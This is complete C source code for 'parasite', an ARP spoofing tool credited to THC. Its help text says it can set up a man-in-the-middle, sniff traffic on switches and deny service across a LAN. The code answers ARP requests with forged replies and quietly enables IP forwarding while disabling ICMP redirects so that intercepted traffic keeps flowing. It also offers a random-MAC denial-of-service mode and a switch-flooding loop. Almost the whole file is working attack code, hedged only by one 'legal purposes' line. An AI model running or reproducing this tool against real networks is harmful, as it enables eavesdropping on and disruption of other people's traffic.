#include "parasite.h"

#define PROGRAM    "parasite"
#define AUTHOR     "van Hauser / THC <vh@reptile.rug.ac.be>"
#define VERSION    "v1.2"
#define RESSOURCE  "http://www.thehackerschoice.com"

#ifdef LINUX
 #ifdef PROC
  #define IP_FORWARD  "/proc/sys/net/ipv4/ip_forward"
  #define ICMP_REDIR1 "/proc/sys/net/ipv4/conf/"
  #define ICMP_REDIR2 "/send_redirects"
  #define ICMP_REDIR_ALL     "/proc/sys/net/ipv4/conf/all/send_redirects"
  #define ICMP_REDIR_DEFAULT "/proc/sys/net/ipv4/conf/default/send_redirects"
 #else
  #define IP_FORWARD  "net.ipv4.ip_forward"
  #define ICMP_REDIR1 "net.ipv4.conf."
  #define ICMP_REDIR2 ".send_redirects"
  #define ICMP_REDIR_ALL     "net.ipv4.conf.all.send_redirects"
  #define ICMP_REDIR_DEFAULT "net.ipv4.conf.default.send_redirects"
 #endif
#elif defined BSD
 #define IP_FORWARD "net.inet.ip.forwarding"
 #define ICMP_REDIR "net.inet.ip.redirect"
#elif defined SOLARIS
 #define IP_FORWARD "ip_forwarding"
 #define ICMP_REDIR "ip_send_redirects"
#else
 #error "You must compile for LINUX, SOLARIS or BSD !"
#endif

#ifdef PROC
 #ifndef LINUX
  #error "PROC maybe only be used together with LINUX !"
 #endif
#elif defined NDD
 #define GET_COMMAND "ndd /dev/ip "
 #define SET_COMMAND1 "ndd -set /dev/ip "
 #define SET_COMMAND2 " "
#elif defined SYSCTL
 #define GET_COMMAND "sysctl -n "
 #define SET_COMMAND1 "sysctl -n -w "
 #define SET_COMMAND2 "="
#elif
 #error "You have to compile with PROC, NDD or SYSCTL !"
#endif

#define SILENT  0
#define DEFAULT 1
#define VERBOSE 2
#define DEBUG   3

char *prg, *mac = NULL, *interface = NULL;
int debug = 0, verbose = DEFAULT, percent = 100, dos = 0, both = 0;
int flood = 0, promisc = 0, route = 1, keep_route = 0;
int random_percent;
pid_t pid;
static struct libnet_link_int *libnet_link = NULL;
char errbuf[PCAP_ERRBUF_SIZE];
static pcap_t *pcap_link = NULL;
FILE *f;
char ip_forward_state[5] = "", icmp_redir_state[5] = "";
#ifdef LINUX
 char icmp_redir_state_all[5] = "", icmp_redir_state_default[5] = "";
 char icmp_redir[64] = "";
#endif
#ifndef PROC
 char cmd[128] = "";
#endif
struct in_addr only_source_ip;
struct in_addr my_ipaddr, source_ipaddr, target_ipaddr;
static u_char spoofed_source_mac[ETHER_ADDR_LEN], my_hwaddr[ETHER_ADDR_LEN] = {"\0", "\0", "\0", "\0", "\0", "\0"};
unsigned char *source_mac, *target_mac, *source_ip, *target_ip;
struct in_addr only_target_ip;
#ifdef SPEED_HACK
 struct arp_packet packet;
#endif
struct sockaddr sa;
int sock;

void help() {
    printf("%s %s by %s
Syntax: %s [-dflsSTbvDFPR] [-p percent] [-m MAC] INTERFACE
Options:
	-d             debug (dont fork and become a deamon + double verbosity)
	-f             run in foreground (dont fork and become a daemon)
	-l             keep routing active after program end (prevents DOS)
	-m <MAC>       send this MAC
	-s             be silent, dont print any output
	-S             only spoof if request is from this source IP
	-T             only spoof if request is for this target IP
	-b             allow -S/-T in both directions
	-v             be verbose, print many information
	-D             send random MACs (results in a network DOS)
	-p <1-99>      percent chance to react to an arp request (e.g. for DOS)
	-F             constantly flood the switch with made-up arp replies
        -P             promisc mode, prevents DOS from -D. needs kernel < 2.2.9
   	-R             DONT activate routing
%s is an ARP reply spoofer for ethernet networks.
It can be used to establish a man-in-the-middle, sniff on switches (even with
port-security on) and denial any communication on the LAN (DOS).
An ethernet interface (e.g. eth0) has to be given as an option to %s.
You can always find the newest version at %s
Use is only permitted for legal purposes. The GPL v2 applies to this code.
", PROGRAM, VERSION, AUTHOR, prg, PROGRAM, PROGRAM, RESSOURCE);
    exit(-1);
}

void cleanup(int signo) {
    if (flood) {
        (void) kill(pid, SIGTERM);
        (void) kill(pid, SIGKILL);
        if (verbose >= VERBOSE) printf("killed flooding process (pid %i)\n",pid);
    }
    if (keep_route)
        if (verbose >= VERBOSE) printf("Keeping IP_FORWARD enabled.\n");
    if (route && ip_forward_state[0] != '\0' && keep_route == 0) {
#ifdef PROC
        if ((f=fopen(IP_FORWARD, "r+")) == NULL) {
            fprintf(stderr, "Warning: cannot find %s to re-establish former IP_FORWARDING state!\n", IP_FORWARD);
            perror("");
        } else {
            fputs(ip_forward_state, f);
            if (verbose >= VERBOSE) printf("Old IP_FORWARD state restored.\n");
            fclose(f);
        }
#else
    snprintf(cmd, sizeof(cmd), "%s%s%s%s > /dev/null", SET_COMMAND1, IP_FORWARD, SET_COMMAND2, ip_forward_state);
    system(cmd);
    if (verbose >= VERBOSE) printf("Old IP_FORWARD state restored via %s%s\n", SET_COMMAND1, IP_FORWARD);
#endif
    }
    if (icmp_redir_state[0] != '\0') {
#ifdef PROC
        if ((f=fopen(icmp_redir, "r+")) == NULL) {
            fprintf(stderr, "Warning: cannot find %s to re-establish former Send ICMP Redirect state!\n", icmp_redir);
            perror("");
        } else {
            fputs(icmp_redir_state, f);
            if (verbose >= VERBOSE) printf("Old Send ICMP Redirect state restored.\n");
            fclose(f);
        }
    }
    if (icmp_redir_state_all[0] != '\0') {
        if ((f=fopen(ICMP_REDIR_ALL, "r+")) == NULL) {
            fprintf(stderr, "Warning: cannot find %s to re-establish former Send ICMP Redirect state!\n", ICMP_REDIR_ALL);
            perror("");
        } else {
            fputs(icmp_redir_state_all, f);
            if (verbose >= DEBUG) printf("Old Send ICMP Redirect state restored.\n");
            fclose(f);
        }
    }
    if (icmp_redir_state_default[0] != '\0') {
        if ((f=fopen(ICMP_REDIR_DEFAULT, "r+")) == NULL) {
            fprintf(stderr, "Warning: cannot find %s to re-establish former Send ICMP Redirect state!\n", ICMP_REDIR_DEFAULT);
            perror("");
        } else {
            fputs(icmp_redir_state_default, f);
            if (verbose >= DEBUG) printf("Old Send ICMP Redirect state restored.\n");
            fclose(f);
        }
#else
 #ifdef LINUX
    snprintf(cmd, sizeof(cmd), "%s%s%s%s > /dev/null", SET_COMMAND1, icmp_redir, SET_COMMAND2, icmp_redir_state);
    system(cmd);
    snprintf(cmd, sizeof(cmd), "%s%s%s%s > /dev/null", SET_COMMAND1, ICMP_REDIR_ALL, SET_COMMAND2, icmp_redir_state);
    system(cmd);
    snprintf(cmd, sizeof(cmd), "%s%s%s%s > /dev/null", SET_COMMAND1, ICMP_REDIR_DEFAULT, SET_COMMAND2, icmp_redir_state);
    system(cmd);
 #else
    snprintf(cmd, sizeof(cmd), "%s%s%s%s > /dev/null", SET_COMMAND1, ICMP_REDIR, SET_COMMAND2, icmp_redir_state);
    system(cmd);
 #endif
    if (verbose >= VERBOSE) printf("Old Send ICMP Redirect state restored.\n");
#endif
    }
    if (pcap_link != NULL)
        (void) pcap_close(pcap_link);
#ifndef SPEED_HACK
    if (libnet_link != NULL)
        (void) libnet_close_link_interface(libnet_link);
#endif
    if (verbose >= DEFAULT) printf("%s terminated.\n", PROGRAM);
    exit(0);
}

void new_random_percent() {
    random_percent = (libnet_get_prand(PR16) / 10 ) % 100;
}

char *generate_random_mac(char *tmpmac) {
    int i;
    tmpmac[0] = 0;
    for (i = 1; i < 6; i++)
        tmpmac[i] = (char) (rand() & 0xff);
    return tmpmac;
}

void generate_arp(unsigned char *pkt, unsigned char *source_hw, unsigned char *target_hw, unsigned char *source_ip, unsigned char *target_ip) {
    libnet_build_ethernet(target_hw, source_hw,  ETHERTYPE_ARP, NULL, 0, pkt);
    libnet_build_arp(ARPHRD_ETHER, ETHERTYPE_IP, ETHER_ADDR_LEN, IP_ADDR_LEN, ARPOP_REPLY, 
        source_hw, source_ip, target_hw, target_ip, NULL, 0, pkt + ETH_H);
}

void process_arp(u_char *foo, const struct pcap_pkthdr *header, const u_char *data) {
    struct libnet_arp_hdr *sniffed;
    unsigned short arp_type;
    char source_ip_string[16], target_ip_string[16];
#ifndef SPEED_HACK
    u_char pkt[60];
#endif

    data += sizeof(struct libnet_ethernet_hdr);
    sniffed = (struct libnet_arp_hdr *) data;
    arp_type = ((unsigned short)ntohs(*(unsigned short *)(&sniffed->ar_op)));

    if (verbose >= DEBUG) printf("Saw an ARP Packet! (type %d)\n", arp_type);
    if (arp_type != ARPOP_REQUEST && arp_type != 137) {
        (void) wait3(NULL, WNOHANG, NULL);
        return; // We only answer ARP Requests
    }

    if (memcmp(sniffed->ar_sha, my_hwaddr, ETHER_ADDR_LEN) == 0) {
        if (verbose >= DEBUG) printf("Saw an ARP Request with my own MAC, ignoring ...\n");
        (void) wait3(NULL, WNOHANG, NULL);
        return;
    }

    if (only_source_ip.s_addr != 0)
        if (
            (memcmp(&only_source_ip.s_addr, sniffed->ar_spa, IP_ADDR_LEN) != 0)
            &&
            (both == 0 || (both && memcmp(&only_source_ip.s_addr, sniffed->ar_tpa, IP_ADDR_LEN) != 0))
           )
            return;
    if (only_target_ip.s_addr != 0)
        if (
            (memcmp(&only_target_ip.s_addr, sniffed->ar_tpa, IP_ADDR_LEN) != 0)
            &&
            (both == 0 || (both && memcmp(&only_target_ip.s_addr, sniffed->ar_spa, IP_ADDR_LEN) != 0))
           )
            return;

    if (percent < 100)
        if (percent < random_percent) {
            if (verbose >= DEBUG) printf("Lost per chance (%d < %d)\n", percent, random_percent);
            new_random_percent();
            return;
        }

#ifdef SPEED_HACK
    memcpy(packet.targ_hw_addr, sniffed->ar_sha, ETH_HW_ADDR_LEN);
    memcpy(packet.rcpt_hw_addr, sniffed->ar_sha, ETH_HW_ADDR_LEN);
    memcpy(packet.rcpt_ip_addr, sniffed->ar_spa, IP_ADDR_LEN);
    memcpy(packet.sndr_ip_addr, sniffed->ar_tpa, IP_ADDR_LEN);
    sendto(sock,&packet,sizeof(packet),0,&sa,sizeof(sa));
#endif
    target_mac = sniffed->ar_sha;
    target_ip  = sniffed->ar_spa;
    source_ip  = sniffed->ar_tpa;
#ifndef SPEED_HACK
    generate_arp((unsigned char *) &pkt, spoofed_source_mac, target_mac, source_ip, target_ip);
    libnet_write_link_layer(libnet_link, interface, pkt, sizeof(pkt));
#endif

    source_mac = sniffed->ar_tha;
    memcpy(&source_ipaddr.s_addr, source_ip, IP_ADDR_LEN);
    memcpy(&target_ipaddr.s_addr, target_ip, IP_ADDR_LEN);
    strcpy(source_ip_string, inet_ntoa(source_ipaddr));
    strcpy(target_ip_string, inet_ntoa(target_ipaddr));
    if (verbose >= VERBOSE) printf("IN (Request): %s %.2x:%.2x:%.2x:%.2x:%.2x:%.2x -> %s %.2x:%.2x:%.2x:%.2x:%.2x:%.2x\n",
             target_ip_string,target_mac[0],target_mac[1],target_mac[2],target_mac[3],target_mac[4],target_mac[5],
             source_ip_string,source_mac[0],source_mac[1],source_mac[2],source_mac[3],source_mac[4],source_mac[5]);
    if (verbose >= DEFAULT) printf("OUT (Reply) : %s %.2x:%.2x:%.2x:%.2x:%.2x:%.2x -> %s %.2x:%.2x:%.2x:%.2x:%.2x:%.2x\n",
             source_ip_string,spoofed_source_mac[0],spoofed_source_mac[1],spoofed_source_mac[2],spoofed_source_mac[3],spoofed_source_mac[4],spoofed_source_mac[5],
             target_ip_string,target_mac[0],target_mac[1],target_mac[2],target_mac[3],target_mac[4],target_mac[5]);

    (void) wait3(NULL, WNOHANG, NULL);

    if (fork() == 0) { // dont care for errors
        signal(SIGINT,  SIG_DFL);
        signal(SIGHUP,  SIG_DFL);
        signal(SIGTERM, SIG_DFL);
        sleep(1);
#ifdef SPEED_HACK
        sendto(sock,&packet,sizeof(packet),0,&sa,sizeof(sa));
#else
        libnet_write_link_layer(libnet_link, interface, pkt, sizeof(pkt));
#endif
        sleep(4);
#ifdef SPEED_HACK
        sendto(sock,&packet,sizeof(packet),0,&sa,sizeof(sa));
#else
        libnet_write_link_layer(libnet_link, interface, pkt, sizeof(pkt));
#endif
        exit(0);
    }
// XXX set_arp(&her_ipaddr, tha);

    if (dos) { // for timing reasons we generate here the mac for the next call
        (void) generate_random_mac(spoofed_source_mac);
#ifdef SPEED_HACK
        memcpy(packet.src_hw_addr, spoofed_source_mac, ETH_HW_ADDR_LEN);
        memcpy(packet.sndr_hw_addr, spoofed_source_mac, ETH_HW_ADDR_LEN);
#endif
    }
    if (percent < 100) { // same for random number
        if (verbose >= DEBUG) printf("Won per chance (%d >= %d)\n", percent, random_percent);
	new_random_percent();
    }

    return;
}

/*  ----------------------------------------------------------  */
/*   MAIN FUNCTION - COMMANDLINE ARGUMENTS AND PRECONFIGURING   */
/*  ----------------------------------------------------------  */

int main(int argc, char *argv[]) {
    int option;
    int foreground = 0;
    struct bpf_program fcode;

    prg = argv[0];
    if (argc < 2)
        help();

    memset(&only_source_ip, 0, sizeof(only_source_ip));
    memset(&only_target_ip, 0, sizeof(only_target_ip));

    while ((option = getopt(argc, argv, "dflm:svDFp:PRS:T:b")) != EOF) {
        switch(option) {
            case 'b' : both = 1; continue;
            case 'd' : debug = 1; verbose++; continue;
            case 'f' : foreground = 1; continue;
            case 'l' : keep_route = 1; continue;
            case 'm' : mac = optarg; 
                       sscanf(mac,"%x:%x:%x:%x:%x:%x",(unsigned int*)&my_hwaddr[0],(unsigned int*)&my_hwaddr[1],(unsigned int*)&my_hwaddr[2],(unsigned int*)&my_hwaddr[3],(unsigned int*)&my_hwaddr[4],(unsigned int*)&my_hwaddr[5]);
                       continue;
            case 's' : if (verbose != 1) {
                           fprintf(stderr, "Error: You can not use the options -s and -v together!\n");
                           exit(-1);
                       }
                       verbose = 0; continue;
            case 'v' : if (verbose < 1) {
                           fprintf(stderr, "Error: You can not use the options -s and -v together!\n");
                           exit(-1);
                       }
                       verbose++; continue;
            case 'D' : dos = 1; continue;
            case 'F' : flood = 1; continue;
            case 'p' : percent = atoi(optarg);
                       if (percent < 1 || percent > 99) {
                           fprintf(stderr, "Error: -p percent option must be between 1 and 99 - %s\n",optarg);
                           exit(-1);
                       }
                       continue;
            case 'P' : promisc = 1; continue;
            case 'R' : route = 0; continue;
            case 'S' : if (only_source_ip.s_addr != 0) printf("Warning: You may supply the -S option only once!\n");
                       if (inet_pton(AF_INET,optarg, &only_source_ip) <= 0) {
                           fprintf(stderr, "Error: Not a valid source IP address %s\n", optarg);
                           exit(-1);
                       }
                       continue;
            case 'T' : if (only_target_ip.s_addr != 0) printf("Warning: You may supply the -T option only once!\n");
                       if (inet_pton(AF_INET,optarg, &only_target_ip) == 0) {
                           fprintf(stderr, "Error: Not a valid target IP address %s\n", optarg);
                           exit(-1);
                       }
                       continue;
            default  : help();
        }
    }
    if (optind + 1 != argc) {
        fprintf(stderr, "Error: missing or too much commandline options!\n\n");
        help();
    }
    interface = argv[argc-1];

    if (geteuid()) {
        fprintf(stderr, "Error: %s needs to be run as root!\n",prg);
        exit(-1);
    }

    if (debug || verbose >= DEBUG) {
        printf("Options: interface = %s, mac = %s, foreground = %i, verbose = %i, percent = %d, dos = %i, flood = %i, route = %i, promisc = %d, keep_route = %d, both = %d",interface,mac,foreground,verbose,percent,dos,flood,route,promisc,keep_route,both);
        printf(", only_source_ip = %s", inet_ntoa(only_source_ip));
        printf(", only_target_ip = %s\n", inet_ntoa(only_target_ip));
    }

    if ((libnet_link = libnet_open_link_interface(interface,errbuf)) == NULL) {
        fprintf(stderr,"Error: %s - %s\n", interface, errbuf);
        exit(-1);
    }

    if (my_hwaddr[0] == 0) {
        memset(&my_ipaddr, 0, sizeof(my_ipaddr));
        my_ipaddr.s_addr = htonl(libnet_get_ipaddr(libnet_link, interface, errbuf));
        memcpy(my_hwaddr, (char *)libnet_get_hwaddr(libnet_link, interface, errbuf), ETHER_ADDR_LEN);
    }
    if (dos)
        (void) generate_random_mac(spoofed_source_mac);
    else
        memcpy(spoofed_source_mac, my_hwaddr, ETHER_ADDR_LEN);

#ifdef LINUX
    strcpy(icmp_redir, ICMP_REDIR1);
    strcat(icmp_redir, interface);
    strcat(icmp_redir, ICMP_REDIR2);
#endif

#ifdef PROC
    if ((f=fopen(icmp_redir, "r+")) == NULL) {
        fprintf(stderr, "Warning: cannot find %s to disable sending ICMP REDIRECTS !\n", icmp_redir);
        perror("");
    } else {
        fgets(icmp_redir_state,sizeof(icmp_redir_state), f);
        fputs("0\n", f);
        if (verbose >= DEBUG) printf("Former state in %s was: %s", icmp_redir, icmp_redir_state);
        if (verbose >= VERBOSE) printf("Sending ICMP Redirects deactivated via %s\n", icmp_redir);
        fclose(f);
    }
    if ((f=fopen(ICMP_REDIR_ALL, "r+")) == NULL) {
        fprintf(stderr, "Warning: cannot find %s to disable sending ICMP REDIRECTS !\n", ICMP_REDIR_ALL);
        perror("");
    } else {
        fgets(icmp_redir_state_all,sizeof(icmp_redir_state_all), f);
        fputs("0\n", f);
        if (verbose >= DEBUG) printf("Former state in %s was: %s", ICMP_REDIR_ALL, icmp_redir_state_all);
        if (verbose >= DEBUG) printf("Sending ICMP Redirects deactivated via %s\n", ICMP_REDIR_ALL);
        fclose(f);
    }
    if ((f=fopen(ICMP_REDIR_DEFAULT, "r+")) == NULL) {
        fprintf(stderr, "Warning: cannot find %s to disable sending ICMP REDIRECTS !\n", ICMP_REDIR_DEFAULT);
        perror("");
    } else {
        fgets(icmp_redir_state_default,sizeof(icmp_redir_state_default), f);
        fputs("0\n", f);
        if (verbose >= DEBUG) printf("Former state in %s was: %s", ICMP_REDIR_DEFAULT, icmp_redir_state_default);
        if (verbose >= DEBUG) printf("Sending ICMP Redirects deactivated via %s\n", ICMP_REDIR_DEFAULT);
        fclose(f);
    }
    if (route) {
        if ((f=fopen(IP_FORWARD, "r+")) == NULL) {
            fprintf(stderr, "Warning: cannot find %s to enable IP_FORWARDING !\n", IP_FORWARD);
            perror("");
        } else {
            fgets(ip_forward_state,sizeof(ip_forward_state),f);
            fputs("1\n",f);
            if (verbose >= DEBUG) printf("Former state in %s was: %s", IP_FORWARD, ip_forward_state);
            if (verbose >= VERBOSE) printf("IP FORWARD activated via %s\n", IP_FORWARD);
            fclose(f);
        }
    }
#else
 #ifdef LINUX
    snprintf(cmd, sizeof(cmd), "%s%s", GET_COMMAND, icmp_redir);
    if ((f=popen(cmd, "r")) == NULL) {
        fprintf(stderr, "Warning: cannot find %s to get ICMP REDIRECTS status via %s\n", icmp_redir, cmd);
        perror("");
    } else {
        fgets(icmp_redir_state,sizeof(icmp_redir_state), f);
        if (verbose >= DEBUG) printf("Former state in %s was: %s", icmp_redir, icmp_redir_state);
        pclose(f);
    }
    snprintf(cmd, sizeof(cmd), "%s%s%s%s > /dev/null", SET_COMMAND1, icmp_redir, SET_COMMAND2, "0");
    system(cmd);
    if (verbose >= VERBOSE) printf("Sending ICMP Redirects deactivated via %s%s\n", SET_COMMAND1, icmp_redir);
    snprintf(cmd, sizeof(cmd), "%s%s", GET_COMMAND, ICMP_REDIR_DEFAULT);
    if ((f=popen(cmd, "r")) == NULL) {
        fprintf(stderr, "Warning: cannot find %s to get ICMP REDIRECTS status via %s\n", ICMP_REDIR_DEFAULT, cmd);
        perror("");
    } else {
        fgets(icmp_redir_state_default,sizeof(icmp_redir_state_default), f);
        if (verbose >= DEBUG) printf("Former state in %s was: %s", ICMP_REDIR_DEFAULT, icmp_redir_state_default);
        pclose(f);
    }
    snprintf(cmd, sizeof(cmd), "%s%s%s%s > /dev/null", SET_COMMAND1, ICMP_REDIR_DEFAULT, SET_COMMAND2, "0");
    system(cmd);
    if (verbose >= DEBUG) printf("Sending ICMP Redirects deactivated via %s%s\n", SET_COMMAND1, ICMP_REDIR_DEFAULT);
    snprintf(cmd, sizeof(cmd), "%s%s", GET_COMMAND, ICMP_REDIR_ALL);
    if ((f=popen(cmd, "r")) == NULL) {
        fprintf(stderr, "Warning: cannot find %s to get ICMP REDIRECTS status via %s\n", ICMP_REDIR_ALL, cmd);
        perror("");
    } else {
        fgets(icmp_redir_state_all,sizeof(icmp_redir_state_all), f);
        if (verbose >= DEBUG) printf("Former state in %s was: %s", ICMP_REDIR_ALL, icmp_redir_state_all);
        pclose(f);
    }
    snprintf(cmd, sizeof(cmd), "%s%s%s%s > /dev/null", SET_COMMAND1, ICMP_REDIR_ALL, SET_COMMAND2, "0");
    system(cmd);
    if (verbose >= DEBUG) printf("Sending ICMP Redirects deactivated via %s%s\n", SET_COMMAND1, ICMP_REDIR_ALL);
    if (icmp_redir_state[strlen(icmp_redir_state)-1] == '\n') icmp_redir_state[strlen(icmp_redir_state)-1] = 0;
    if (icmp_redir_state_default[strlen(icmp_redir_state_default)-1] == '\n') icmp_redir_state_default[strlen(icmp_redir_state_default)-1] = 0;
    if (icmp_redir_state_all[strlen(icmp_redir_state_all)-1] == '\n') icmp_redir_state_all[strlen(icmp_redir_state_all)-1] = 0;
 #else
    snprintf(cmd, sizeof(cmd), "%s%s", GET_COMMAND, ICMP_REDIR);
    if ((f=popen(cmd, "r")) == NULL) {
        fprintf(stderr, "Warning: cannot find %s to get ICMP REDIRECTS status via %s\n", ICMP_REDIR, cmd);
        perror("");
    } else {
        fgets(icmp_redir_state,sizeof(icmp_redir_state), f);
        if (verbose >= DEBUG) printf("Former state in %s was: %s", ICMP_REDIR, icmp_redir_state);
        pclose(f);
    }
    snprintf(cmd, sizeof(cmd), "%s%s%s%s > /dev/null", SET_COMMAND1, ICMP_REDIR, SET_COMMAND2, "0");
    system(cmd);
    if (verbose >= VERBOSE) printf("Sending ICMP Redirects deactivated via %s%s\n", SET_COMMAND1, ICMP_REDIR);
    if (icmp_redir_state[strlen(icmp_redir_state)-1] == '\n') icmp_redir_state[strlen(icmp_redir_state)-1] = 0;
 #endif
    if (route) {
        snprintf(cmd, sizeof(cmd), "%s%s", GET_COMMAND, IP_FORWARD);
        if ((f=popen(cmd, "r")) == NULL) {
            fprintf(stderr, "Warning: cannot find %s to get IP FORWARD status via %s\n", IP_FORWARD, cmd);
            perror("");
        } else {
            fgets(ip_forward_state,sizeof(ip_forward_state), f);
            if (verbose >= DEBUG) printf("Former state in %s was: %s", IP_FORWARD, ip_forward_state);
            pclose(f);
        }
        snprintf(cmd, sizeof(cmd), "%s%s%s%s > /dev/null", SET_COMMAND1, IP_FORWARD, SET_COMMAND2, "1");
        system(cmd);
        if (verbose >= VERBOSE) printf("IP FORWARD activated via %s%s\n", SET_COMMAND1, IP_FORWARD);
        if (ip_forward_state[strlen(ip_forward_state)-1] == '\n') ip_forward_state[strlen(ip_forward_state)-1] = 0;
    }
#endif
    
    if (! debug && ! foreground) {
        if ((pid = fork()) == -1) {
            perror("");
            exit(-1);
        }
        if (pid != 0) {
            if (verbose >= DEFAULT) printf("%s spawned and running! Type \"kill %i\" to terminate.\n", PROGRAM, pid);
            return(0);
        }
    }
    
    libnet_seed_prand();

    if (flood) {
        if ((pid = fork()) == -1) {
            perror("");
            exit(-1);
        }
        signal(SIGINT,  SIG_DFL);
        signal(SIGHUP,  SIG_DFL);
        signal(SIGTERM, SIG_DFL);
        if (pid != 0 && verbose >= VERBOSE) printf("%s forked again for flooding (pid %i)\n",prg,pid);
        if (pid == 0) {
            u_char pkt[60];
            static u_char random_mac1[ETHER_ADDR_LEN], random_mac2[ETHER_ADDR_LEN];
            unsigned char null_ip[5] = { "\0", "\0", "\0", "\0", "\0", };
            while (1) { /* this is the flooding section */
                (void) generate_random_mac(random_mac1);
                (void) generate_random_mac(random_mac2);
                generate_arp((unsigned char *) &pkt, random_mac1, random_mac2, null_ip, null_ip);
                libnet_write_link_layer(libnet_link, interface, pkt, sizeof(pkt));
                usleep(7);
            }
            return(0); // not reached
        }
    }

    if (percent < 100)
        new_random_percent();

    signal(SIGINT,  cleanup);
    signal(SIGHUP,  cleanup);
    signal(SIGTERM, cleanup);

#ifdef SPEED_HACK
    sock=socket(AF_INET,SOCK_RAW,htons(ETH_P_RARP));
    packet.frame_type = htons(ARP_FRAME_TYPE);
    packet.hw_type = htons(ETHER_HW_TYPE);
    packet.prot_type = htons(IP_PROTO_TYPE);
    packet.hw_addr_size = ETH_HW_ADDR_LEN;
    packet.prot_addr_size = IP_ADDR_LEN;
    packet.op=htons(OP_ARP_REQUEST);
    memcpy(packet.src_hw_addr, spoofed_source_mac, ETH_HW_ADDR_LEN);
    memcpy(packet.sndr_hw_addr, spoofed_source_mac, ETH_HW_ADDR_LEN);
    bzero(packet.padding,18);
    strcpy(sa.sa_data, interface);
#endif

    if ((pcap_link = pcap_open_live(interface, 68, promisc, 10, errbuf)) == NULL) {
        fprintf(stderr,"Error: %s\n",errbuf);
        exit(-1);
    }
    if (pcap_compile(pcap_link, &fcode, "arp", 1, 0) < 0) {
        fprintf(stderr,"Error: %s\n",errbuf);
        exit(-1);
    }
    if (debug || foreground) printf("%s started and running now, press Control-C to quit...\n", prg);
    if (pcap_loop(pcap_link, -1, process_arp, 0) < 0) {
        fprintf(stderr,"Error: %s\n",errbuf);
        exit(-1);
    }
    fprintf(stderr, "Error: PCAP exited.\n");
    cleanup(0);
    return(0); // not reached
}
